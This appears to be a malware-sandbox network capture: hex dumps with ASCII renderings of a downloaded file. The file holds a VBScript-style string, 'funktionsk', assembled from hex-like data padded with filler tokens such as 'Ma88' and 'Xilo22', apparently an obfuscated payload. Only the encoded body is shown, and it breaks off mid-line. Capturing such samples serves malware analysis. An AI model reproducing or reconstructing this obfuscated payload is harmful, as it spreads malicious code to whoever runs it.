                                    2022-05-12 12:01:32 UTC78INData Raw: 4c 4c 43 41 4c 4c 43 3a 43 41 32 42 33 35 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43
                                    Data Ascii: LLCALLC:CA2B35C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C
                                    2022-05-12 12:01:32 UTC86INData Raw: 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 45 39 43 39 37 44 33 43 41 4c 4c 58 69 6c 6f 32 32 58 69 6c 6f 32 32 36 4d 61 38 38 33 35 42 37 35 33 4d 61 38 38 43 36 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 43 3a 43 43 3a 43 39 43 41 4c 4c 38 58 69 6c 6f 32 32 42 43 41 4c 4c 45 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 37 39 43 35 36 36 32 41 33 37 37 44 44 44 33 4d 61 38 38 38 32 58 69 6c 6f 32 32 35 35 45 41 43 38 37 44 43 41 4c 4c 58 69 6c 6f 32 32 42 36 33 42 39 37 43 45 38 32 44 38 43 32 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 42 44 32 33 43 41 4c 4c 35 41 33 43 41 4c 4c 45 43 45 42 38 43 41 4c 4c 43 43 38 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 38 45 45 35 44 43 43 41 4c 4c 4d 61 38 38 33 43 41 4c 4c 32 36 41 38 4d 61 38 38 44 43 41 4c 4c 58 69 6c
                                    Data Ascii: Ma88C:C5CALL38E9C97D3CALLXilo22Xilo226Ma8835B753Ma88C6CALLCALLCALLC:CC:C9CALL8Xilo22BCALLECMa88C:C5CALL3979C5662A377DDD3Ma8882Xilo2255EAC87DCALLXilo22B63B97CE82D8C2C:C53CALL3Ma88BD23CALL5A3CALLECEB8CALLCC8C:C53CALL3Ma88A8EE5DCCALLMa883CALL26A8Ma88DCALLXil
                                    2022-05-12 12:01:32 UTC94INData Raw: 42 32 35 45 43 41 4c 4c 44 42 41 36 36 39 43 41 4c 4c 43 41 4c 4c 32 39 33 41 38 43 41 4c 4c 39 32 37 58 69 6c 6f 32 32 38 32 35 38 39 35 43 3a 43 33 44 32 4d 61 38 38 33 43 4d 61 38 38 39 44 42 44 42 33 37 32 4d 61 38 38 32 43 41 4c 4c 39 45 58 69 6c 6f 32 32 42 37 43 3a 43 58 69 6c 6f 32 32 44 44 39 43 43 3a 43 58 69 6c 6f 32 32 33 44 38 43 41 4c 4c 58 69 6c 6f 32 32 45 43 4d 61 38 38 42 58 69 6c 6f 32 32 35 43 3a 43 58 69 6c 6f 32 32 37 58 69 6c 6f 32 32 58 69 6c 6f 32 32 42 32 36 33 32 58 69 6c 6f 32 32 36 41 41 37 44 43 41 4c 4c 43 3a 43 36 58 69 6c 6f 32 32 36 45 36 39 33 43 32 43 43 41 4c 4c 33 38 44 44 33 43 41 4c 4c 41 36 39 38 4d 61 38 38 4d 61 38 38 44 42 4d 61 38 38 43 41 4c 4c 43 36 38 33 43 41 4c 4c 44 4d 61 38 38 38 33 43 41 4c 4c 43 43 4d
                                    Data Ascii: B25ECALLDBA669CALLCALL293A8CALL927Xilo22825895C:C3D2Ma883CMa889DBDB372Ma882CALL9EXilo22B7C:CXilo22DD9CC:CXilo223D8CALLXilo22ECMa88BXilo225C:CXilo227Xilo22Xilo22B2632Xilo226AA7DCALLC:C6Xilo226E693C2CCALL38DD3CALLA698Ma88Ma88DBMa88CALLC683CALLDMa8883CALLCCM
                                    2022-05-12 12:01:32 UTC101INData Raw: 39 37 37 37 35 36 43 41 4c 4c 33 44 43 41 4c 4c 43 43 4d 61 38 38 33 4d 61 38 38 45 37 39 41 43 3a 43 35 38 36 4d 61 38 38 37 33 45 4d 61 38 38 37 43 3a 43 36 39 44 37 35 36 58 69 6c 6f 32 32 32 39 35 39 37 39 4d 61 38 38 4d 61 38 38 43 43 3a 43 4d 61 38 38 43 37 45 42 4d 61 38 38 43 41 4c 4c 43 32 43 3a 43 39 41 36 39 44 41 58 69 6c 6f 32 32 41 39 41 39 58 69 6c 6f 32 32 32 33 38 36 42 42 42 33 32 33 36 36 37 44 43 41 4c 4c 33 37 45 35 43 41 4c 4c 37 33 36 45 43 58 69 6c 6f 32 32 44 32 37 38 58 69 6c 6f 32 32 32 43 43 3a 43 58 69 6c 6f 32 32 43 3a 43 45 37 35 39 44 32 45 36 33 42 38 33 43 3a 43 58 69 6c 6f 32 32 39 32 45 43 38 38 43 3a 43 42 43 39 33 39 43 4d 61 38 38 43 43 3a 43 43 3a 43 43 43 41 4c 4c 38 36 43 43 41 4c 4c 35 38 39 41 39 43 3a 43 58 69
                                    Data Ascii: 977756CALL3DCALLCCMa883Ma88E79AC:C586Ma8873EMa887C:C69D756Xilo22295979Ma88Ma88CC:CMa88C7EBMa88CALLC2C:C9A69DAXilo22A9A9Xilo222386BBB323667DCALL37E5CALL736ECXilo22D278Xilo222CC:CXilo22C:CE759D2E63B83C:CXilo2292EC88C:CBC939CMa88CC:CC:CCCALL86CCALL589A9C:CXi
                                    2022-05-12 12:01:32 UTC109INData Raw: 44 39 37 38 39 43 4d 61 38 38 43 3a 43 35 42 36 58 69 6c 6f 32 32 37 43 3a 43 39 43 41 4c 4c 4d 61 38 38 35 58 69 6c 6f 32 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 42 42 58 69 6c 6f 32 32 41 37 45 45 43 3a 43 42 39 42 43 41 4c 4c 43 3a 43 44 43 43 3a 43 44 58 69 6c 6f 32 32 41 45 36 33 41 41 39 37 37 44 33 36 42 37 37 45 44 58 69 6c 6f 32 32 37 42 43 43 3a 43 43 39 44 44 36 32 33 42 36 4d 61 38 38 37 38 32 45 37 44 43 41 4c 4c 35 43 41 4c 4c 44 33 33 43 45 38 41 39 32 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 37 35 37 35 36 43 3a 43 33 44 43 41 4c 4c 43 43 4d 61 38 38 43 43 45 58 69 6c 6f 32 32 43 43 3a 43 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 33 42 43 3a 43 43 3a 43 39 45 58 69 6c 6f 32 32 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 43 3a 43 43
                                    Data Ascii: D9789CMa88C:C5B6Xilo227C:C9CALLMa885Xilo22CALLDCMa88C:C5BBXilo22A7EEC:CB9BCALLC:CDCC:CDXilo22AE63AA977D36B77EDXilo227BCC:CC9DD623B6Ma88782E7DCALL5CALLD33CE8A92CXilo22C:C53CALL75756C:C3DCALLCCMa88CCEXilo22CC:CXilo229Xilo223BC:CC:C9EXilo22C:C73CALLCALLCC:CC
                                    2022-05-12 12:01:32 UTC117INData Raw: 41 4c 4c 33 38 45 39 41 43 37 32 42 44 39 42 38 44 37 43 3a 43 42 37 37 35 44 32 39 33 44 43 41 4c 4c 43 43 4d 61 38 38 38 39 43 3a 43 42 43 33 33 43 41 4c 4c 4d 61 38 38 45 43 3a 43 41 58 69 6c 6f 32 32 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 45 43 43 3a 43 38 4d 61 38 38 44 41 39 36 44 58 69 6c 6f 32 32 33 36 39 43 3a 43 39 43 41 4c 4c 38 43 38 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 35 45 43 37 42 43 43 3a 43 43 41 45 36 33 45 43 3a 43 43 3a 43 43 43 4d 61 38 38 39 42 36 36 38 58 69 6c 6f 32 32 33 58 69 6c 6f 32 32 43 35 35 42 58 69 6c 6f 32 32 32 38 37 43 41 4c 4c 39 4d 61 38 38 45 39 41 32 42 43 41 4c 4c 38 39 43 3a 43 41 44 35 43 43 33 4d 61 38 38 39 42 43 3a 43 33 37 41 43 33 38 33 43 44 42 33 43 3a 43 42 43 41 4c 4c 41 37 44 33 37
                                    Data Ascii: ALL38E9AC72BD9B8D7C:CB775D293DCALLCCMa8889C:CBC33CALLMa88EC:CAXilo22CALLCALLCALLECC:C8Ma88DA96DXilo22369C:C9CALL8C8CALLDCMa88C:C5CALL395EC7BCC:CCAE63EC:CC:CCCMa889B668Xilo223Xilo22C55BXilo22287CALL9Ma88E9A2BCALL89C:CAD5CC3Ma889BC:C37AC383CDB3C:CBCALLA7D37
                                    2022-05-12 12:01:32 UTC125INData Raw: 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 4d 61 38 38 39 43 44 35 4d 61 38 38 45 45 4d 61 38 38 32 42 43 43 43 41 4c 4c 39 41 41 43 3a 43 42 43 41 4c 4c 4d 61 38 38 42 58 69 6c 6f 32 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 4d 61 38 38 38 39 43 41 4c 4c 38 38 39 43 3a 43 58 69 6c 6f 32 32 43 41 4c 4c 36 41 38 35 36 44 37 43 3a 43 33 39 43 41 4c 4c 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 42 36 37 36 45 35 41 43 41 4c 4c 38 43 58 69 6c 6f 32 32 37 43 3a 43 35 41 42 43 35 36 39 36 45 35 4d 61 38 38 4d 61 38 38 37 43 4d 61 38 38 44 41 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 4d 61 38 38 4d 61 38 38 43 3a 43 38 39 4d 61 38 38 43 41 4c 4c 32 43 41 4c 4c 33 38 42 35 33 38 44 32 45 44 43 3a 43 45 45 42 41 44 41 37 43 3a 43 58 69 6c
                                    Data Ascii: 2CALLDCMa88C:C5CALL38Ma889CD5Ma88EEMa882BCCCALL9AAC:CBCALLMa88BXilo22CALLDCMa88C:C5CMa8889CALL889C:CXilo22CALL6A856D7C:C39CALLC:C53CALL3Ma88B676E5ACALL8CXilo227C:C5ABC5696E5Ma88Ma887CMa88DACALLDCMa88C:C5Ma88Ma88C:C89Ma88CALL2CALL38B538D2EDC:CEEBADA7C:CXil
                                    2022-05-12 12:01:32 UTC133INData Raw: 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 38 39 43 3a 43 42 35 36 37 37 35 38 38 43 41 4c 4c 35 37 35 41 43 3a 43 33 41 37 45 41 58 69 6c 6f 32 32 45 41 41 43 37 37 41 4d 61 38 38 43 33 58 69 6c 6f 32 32 44 39 42 44 58 69 6c 6f 32 32 41 33 43 41 4c 4c 58 69 6c 6f 32 32 42 4d 61 38 38 43 43 36 35 41 36 41 43 43 44 39 43 33 35 39 33 4d 61 38 38 42 58 69 6c 6f 32 32 42 43 3a 43 43 41 4c 4c 43 33 58 69 6c 6f 32 32 44 38 41 32 42 42 35 45 43 36 42 41 43 3a 43 41 42 38 4d
                                    Data Ascii: 63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C789C:CB5677588CALL575AC:C3A7EAXilo22EAAC77AMa88C3Xilo22D9BDXilo22A3CALLXilo22BMa88CC65A6ACCD9C3593Ma88BXilo22BC:CCALLC3Xilo22D8A2BB5EC6BAC:CAB8M
                                    2022-05-12 12:01:32 UTC140INData Raw: 43 3a 43 32 37 45 44 35 43 38 33 35 33 45 43 38 43 3a 43 35 43 41 4c 4c 33 39 33 35 33 39 45 36 44 43 41 4c 4c 41 43 41 4c 4c 43 3a 43 35 39 43 41 4c 4c 38 42 37 41 32 44 41 36 32 58 69 6c 6f 32 32 33 58 69 6c 6f 32 32 43 3a 43 36 32 39 45 39 38 37 35 58 69 6c 6f 32 32 33 42 36 36 58 69 6c 6f 32 32 43 33 43 3a 43 37 33 43 41 4c 4c 43 41 4c 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 4c 43 43 3a 43 42 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 42 43 41 4c 4c 43 3a 43 4d 61 38 38 43 32 44 37 37 35 45 45 43 41 4c 4c 4d 61 38 38 58 69 6c 6f 32 32 41 41 35 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 43 41 4c 4c 32 36 43 41 4c 4c 43 3a 43 36 37 43 3a 43 43 41 43 41 4c 4c 41 36 32 42 33 35 43 41 4c 4c 4d 61 38 38 58
                                    Data Ascii: C:C27ED5C8353EC8C:C5CALL393539E6DCALLACALLC:C59CALL8B7A2DA62Xilo223Xilo22C:C629E9875Xilo223B66Xilo22C3C:C73CALLCAL"funktionsk = funktionsk & "LCC:CBXilo229Xilo22BCALLC:CMa88C2D775EECALLMa88Xilo22AA5Ma88Xilo22Xilo22CALL26CALLC:C67C:CCACALLA62B35CALLMa88X
                                    2022-05-12 12:01:32 UTC148INData Raw: 41 44 44 45 36 43 41 4c 4c 32 45 43 4d 61 38 38 43 32 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 42 37 43 41 4c 4c 43 3a 43 36 42 41 42 4d 61 38 38 43 43 41 4c 4c 44 43 41 4c 4c 39 43 43 43 3a 43 35 39 4d 61 38 38 37 41 45 41 36 58 69 6c 6f 32 32 44 4d 61 38 38 38 4d 61 38 38 38 42 42 44 4d 61 38 38 4d 61 38 38 32 37 45 43 45 42 32 35 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 43 3a 43 36 39 44 43 3a 43 43 33 44 36 43 41 4c 4c 32 38 36 45 58 69 6c 6f 32 32 44 43 41 4c 4c 43 43 4d 61 38 38 43 43 42 41 32 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 39 38 32 45 42 43 3a 43 39 42 38 38 33 58 69 6c 6f 32 32 44 37 38 4d 61 38 38 38 44 58 69 6c 6f 32 32 37 4d 61 38 38 43 41 4c 4c 39 32 41 42 33
                                    Data Ascii: ADDE6CALL2ECMa88C2"funktionsk = funktionsk & "B7CALLC:C6BABMa88CCALLDCALL9CCC:C59Ma887AEA6Xilo22DMa888Ma888BBDMa88Ma8827ECEB25CCMa88C:C53CALLC:C69DC:CC3D6CALL286EXilo22DCALLCCMa88CCBA2CCMa88C:C53CALL3Ma88A982EBC:C9B883Xilo22D78Ma888DXilo227Ma88CALL92AB3
                                    2022-05-12 12:01:32 UTC156INData Raw: 38 38 43 43 45 43 3a 43 43 41 4c 4c 45 4d 61 38 38 43 3a 43 36 35 38 43 3a 43 38 35 35 32 37 45 32 4d 61 38 38 43 32 43 41 4c 4c 41 36 4d 61 38 38 43 3a 43 41 43 3a 43 35 44 36 41 45 45 38 45 37 43 33 43 36 38 43 3a 43 39 33 4d 61 38 38 43 36 36 37 32 38 43 45 42 41 4d 61 38 38 38 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 33 45 43 43 3a 43 43 3a 43 35 43 4d 61 38 38 43 3a 43 39 32 38 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 33 43 41 4c 4c 43 41 4c 4c 4d 61 38 38 44 43 41 4c 4c 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 43 3a 43 33 43 3a 43 43 3a 43 41 43 43 3a 43 39 45 42 43 3a 43 44 4d 61 38 38 44 39 44 41 36 37 43 41 4c 4c 39 41 36 39 39 37 33 33 37 58 69 6c 6f 32 32 39 44 32 44 37 41 44 4d 61 38 38 43 41 4c 4c 43 33 43 4d 61 38 38 43
                                    Data Ascii: 88CCEC:CCALLEMa88C:C658C:C85527E2Ma88C2CALLA6Ma88C:CAC:C5D6AEE8E7C3C68C:C93Ma88C66728CEBAMa888CMa88C:C53CALL3ECC:CC:C5CMa88C:C928C:C53CALLCALLC3CALLCALLMa88DCALLCALLCCMa88C:C5CALL39C:C3C:CC:CACC:C9EBC:CDMa88D9DA67CALL9A6997337Xilo229D2D7ADMa88CALLC3CMa88C
                                    2022-05-12 12:01:32 UTC164INData Raw: 43 42 45 41 58 69 6c 6f 32 32 35 37 42 32 37 33 58 69 6c 6f 32 32 37 45 33 44 43 38 43 3a 43 44 35 37 39 33 37 44 45 38 43 41 4c 4c 4d 61 38 38 38 45 43 3a 43 36 45 35 33 32 4d 61 38 38 58 69 6c 6f 32 32 35 45 58 69 6c 6f 32 32 45 42 43 37 43 41 4c 4c 43 39 36 44 35 4d 61 38 38 43 43 33 4d 61 38 38 4d 61 38 38 36 4d 61 38 38 33 4d 61 38 38 35 36 43 3a 43 4d 61 38 38 44 32 39 43 37 38 42 44 38 32 42 43 3a 43 35 32 43 43 3a 43 45 43 38 38 42 42 36 43 41 4c 4c 41 44 32 33 38 42 41 44 37 32 43 38 43 45 44 33 42 38 33 43 41 4c 4c 4d 61 38 38 36 43 33 43 41 4c 4c 33 39 37 38 42 42 4d 61 38 38 43 41 4c 4c 37 4d 61 38 38 35 33 38 44 41 36 33 43 41 4c 4c 32 33 37 42 43 3a 43 42 38 38 43 43 41 4c 4c 33 43 41 4c 4c 39 37 44 35 37 43 44 37 44 39 44 38 32 38 42 37 38
                                    Data Ascii: CBEAXilo2257B273Xilo227E3DC8C:CD57937DE8CALLMa888EC:C6E532Ma88Xilo225EXilo22EBC7CALLC96D5Ma88CC3Ma88Ma886Ma883Ma8856C:CMa88D29C78BD82BC:C52CC:CEC88BB6CALLAD238BAD72C8CED3B83CALLMa886C3CALL3978BBMa88CALL7Ma88538DA63CALL237BC:CB88CCALL3CALL97D57CD7D9D828B78
                                    2022-05-12 12:01:32 UTC172INData Raw: 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 42 42 32 43 3a 43 41 36 43 43 3a 43 43 4d 61 38 38 37 58 69 6c 6f 32 32 37 38 41 44 37 41 58 69 6c 6f 32 32 44 33 43 41 4c 4c 42 41 43 41 4c 4c 32 43 44 38 45 58 69 6c 6f 32 32 39 41 37 38 32 36 37 37 33 42 58 69 6c 6f 32 32 37 33 39 45 37 33 42 43 41 4c 4c 36 36 42 37 43 3a 43 43 3a 43 42 41 37 4d 61 38 38 33 43 38 4d 61 38 38 33 4d 61 38 38 38 35 33 58 69 6c 6f 32 32 42 44 37 37 4d 61 38 38 33 33 43 3a 43 43 36 36 42 37 33 38 41 43 3a 43 43 33 33 33 32 45 43 39 39 36 33 36 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 43 41 4c 4c 44 38 44 44 33 38 4d 61 38 38 43 43 41 4c 4c 44 35 33 42 58 69 6c 6f 32 32
                                    Data Ascii: 63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863BB2C:CA6CC:CCMa887Xilo2278AD7AXilo22D3CALLBACALL2CD8EXilo229A7826773BXilo22739E73BCALL66B7C:CC:CBA7Ma883C8Ma883Ma88853Xilo22BD77Ma8833C:CC66B738AC:CC3332EC99636Ma88Xilo22Xilo22CALLD8DD38Ma88CCALLD53BXilo22
                                    2022-05-12 12:01:32 UTC180INData Raw: 37 43 3a 43 43 3a 43 41 4d 61 38 38 42 43 33 44 43 32 43 43 41 32 35 33 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 43 43 3a 43 58 69 6c 6f 32 32 38 43 43 43 41 4c 4c 43 3a 43 37 39 58 69 6c 6f 32 32 42 58 69 6c 6f 32 32 36 44 43 3a 43 45 4d 61 38 38 45 32 58 69 6c 6f 32 32 45 39 4d 61 38 38 4d 61 38 38 42 41 58 69 6c 6f 32 32 36 4d 61 38 38 36 43 33 42 36 45 37 41 37 37 58 69 6c 6f 32 32 43 3a 43 38 42 32 33 58 69 6c 6f 32 32 44 41 37 36 43 41 4c 4c 42 32 35 45 44 39 39 33 38 32 39 58 69 6c 6f 32 32 43 33 38 38 41 44 37 43 3a 43 39 41 43 3a 43 42 44 38 39 4d 61 38 38 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 35 39 37 44 33 42 43 41 4c 4c 41 45 45 37 37 39 43 36 58 69 6c 6f 32 32 33 33 37 39 58 69 6c 6f 32 32 42 43 43 42 41 44 4d 61 38 38 43 32 43 3a
                                    Data Ascii: 7C:CC:CAMa88BC3DC2CCA253CXilo22C:C53CALLCC:CXilo228CCCALLC:C79Xilo22BXilo226DC:CEMa88E2Xilo22E9Ma88Ma88BAXilo226Ma886C3B6E7A77Xilo22C:C8B23Xilo22DA76CALLB25ED993829Xilo22C388AD7C:C9AC:CBD89Ma88CALLDCMa88C:C5597D3BCALLAEE779C6Xilo223379Xilo22BCCBADMa88C2C:
                                    2022-05-12 12:01:32 UTC187INData Raw: 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 41 36 37 43 43 41 4c 4c 37 37 37 39 43 36 58 69 6c 6f 32 32 33 33 37 37 38 43 3a 43 36 58 69 6c 6f 32 32 32 43 41 4c 4c 43 41 4c 4c 44 58 69 6c 6f 32 32 38 43 43 43 41 4c 4c 39 37 43 33 43 41 42 43 38 32 37 41 36 37 43 45 37 37 35 58 69 6c 6f 32 32 43 41 4c 4c 35 33 32 38 58 69 6c 6f 32 32 37 44 43 33 37 38 39 58 69 6c 6f 32 32 35 35 35 44 36 36 42 45 44 35 37 43 3a 43 4d 61 38 38 37 43 37 35 45 45 43 58 69 6c 6f 32 32 4d 61 38 38 58 69 6c 6f 32 32 41 43 41 4c 4c 58 69 6c 6f 32 32 32 44 32 42 43 3a 43 39 58 69 6c
                                    Data Ascii: C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma88A67CCALL7779C6Xilo2233778C:C6Xilo222CALLCALLDXilo228CCCALL97C3CABC827A67CE775Xilo22CALL5328Xilo227DC3789Xilo22555D66BED57C:CMa887C75EECXilo22Ma88Xilo22ACALLXilo222D2BC:C9Xil
                                    2022-05-12 12:01:32 UTC195INData Raw: 44 4d 61 38 38 39 41 43 3a 43 58 69 6c 6f 32 32 42 45 58 69 6c 6f 32 32 35 58 69 6c 6f 32 32 33 43 43 41 4c 4c 43 4d 61 38 38 43 41 4c 4c 36 42 35 33 43 41 4c 4c 42 41 35 45 33 42 43 3a 43 35 45 45 33 45 43 41 4c 4c 43 43 4d 61 38 38 43 4d 61 38 38 43 3a 43 35 44 37 38 41 43 43 3a 43 38 41 35 37 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 43 43 41 4c 4c 4d 61 38 38 44 37 4d 61 38 38 4d 61 38 38 43 41 4c 4c 37 44 37 35 45 45 33 45 43 41 4c 4c 43 43 4d 61 38 38 33 45 32 42 45 33 43 3a 43 44 41 45 32 35 43 3a 43 39 45 33 35 38 39 38 42 4d 61 38 38 36 32 58 69 6c 6f 32 32 38 43 3a 43 45 4d 61 38 38 43 42 32 45 43 42 43 3a 43 58 69 6c 6f 32 32 39 37 35 36 36 32 32 35 42 38 43 45 37 36 32 38 44 33 4d 61 38 38 33 37 39 36 37 37 32 35 43 43 3a 43 38 41 35 37
                                    Data Ascii: DMa889AC:CXilo22BEXilo225Xilo223CCALLCMa88CALL6B53CALLBA5E3BC:C5EE3ECALLCCMa88CMa88C:C5D78ACC:C8A57CXilo22C:C53CALLCCALLMa88D7Ma88Ma88CALL7D75EE3ECALLCCMa883E2BE3C:CDAE25C:C9E35898BMa8862Xilo228C:CEMa88CB2ECBC:CXilo2297566225B8CE7628D3Ma8837967725CC:C8A57
                                    2022-05-12 12:01:32 UTC203INData Raw: 43 41 4c 4c 4d 61 38 38 42 42 36 39 43 3a 43 32 45 44 32 58 69 6c 6f 32 32 39 45 43 39 43 3a 43 58 69 6c 6f 32 32 42 42 58 69 6c 6f 32 32 32 39 38 36 58 69 6c 6f 32 32 37 4d 61 38 38 33 4d 61 38 38 37 39 42 45 4d 61 38 38 43 3a 43 43 4d 61 38 38 4d 61 38 38 33 39 45 32 33 42 45 4d 61 38 38 36 39 33 37 43 42 42 58 69 6c 6f 32 32 39 43 3a 43 42 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 42 45 4d 61 38 38 4d 61 38 38 36 43 3a 43 35 4d 61 38 38 32 37 43 43 4d 61 38 38 43 44 42 43 41 4c 4c 43 43 36 4d 61 38 38 43 35 33 43 41 4c 4c 43 41 4c 4c 39 41 36 58 69 6c 6f 32 32 32 35 39 43 3a 43 33 37 43 43 3a 43 35 35 39 41 33 4d 61 38 38 36 4d 61 38 38 35 33 45 39 43 41 36 42 32 43 41 4c 4c 38 33 43 41 4c 4c 44 32 43 35 43 3a 43 43 41 4c 4c 43 41 4c 4c 44 33 58
                                    Data Ascii: CALLMa88BB69C:C2ED2Xilo229EC9C:CXilo22BBXilo222986Xilo227Ma883Ma8879BEMa88C:CCMa88Ma8839E23BEMa886937CBBXilo229C:CBMa88Xilo22Xilo22BEMa88Ma886C:C5Ma8827CCMa88CDBCALLCC6Ma88C53CALLCALL9A6Xilo22259C:C37CC:C559A3Ma886Ma8853E9CA6B2CALL83CALLD2C5C:CCALLCALLD3X
                                    2022-05-12 12:01:32 UTC211INData Raw: 38 38 33 33 43 41 4c 4c 42 41 36 58 69 6c 6f 32 32 39 41 43 3a 43 58 69 6c 6f 32 32 42 43 41 4c 4c 37 43 41 4c 4c 32 36 43 3a 43 4d 61 38 38 4d 61 38 38 36 43 39 32 41 43 41 4c 4c 38 39 36 42 43 41 4c 4c 39 37 33 36 37 58 69 6c 6f 32 32 35 39 43 35 4d 61 38 38 58 69 6c 6f 32 32 43 35 37 43 4d 61 38 38 41 39 43 41 4c 4c 37 43 43 41 4c 4c 43 3a 43 37 35 38 33 42 32 37 43 41 4c 4c 37 35 43 3a 43 44 37 43 41 4c 4c 33 44 43 41 4c 4c 43 43 4d 61 38 38 45 44 58 69 6c 6f 32 32 43 43 3a 43 35 32 35 58 69 6c 6f 32 32 43 36 38 39 36 43 3a 43 43 3a 43 38 43 3a 43 42 45 4d 61 38 38 44 45 33 43 41 4c 4c 37 42 58 69 6c 6f 32 32 38 43 3a 43 43 3a 43 43 3a 43 41 41 42 45 58 69 6c 6f 32 32 35 42 44 32 39 41 43 3a 43 42 39 43 3a 43 58 69 6c 6f 32 32 42 43 3a 43 37 36 42 33
                                    Data Ascii: 8833CALLBA6Xilo229AC:CXilo22BCALL7CALL26C:CMa88Ma886C92ACALL896BCALL97367Xilo2259C5Ma88Xilo22C57CMa88A9CALL7CCALLC:C7583B27CALL75C:CD7CALL3DCALLCCMa88EDXilo22CC:C525Xilo22C6896C:CC:C8C:CBEMa88DE3CALL7BXilo228C:CC:CC:CAABEXilo225BD29AC:CB9C:CXilo22BC:C76B3
                                    2022-05-12 12:01:32 UTC219INData Raw: 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 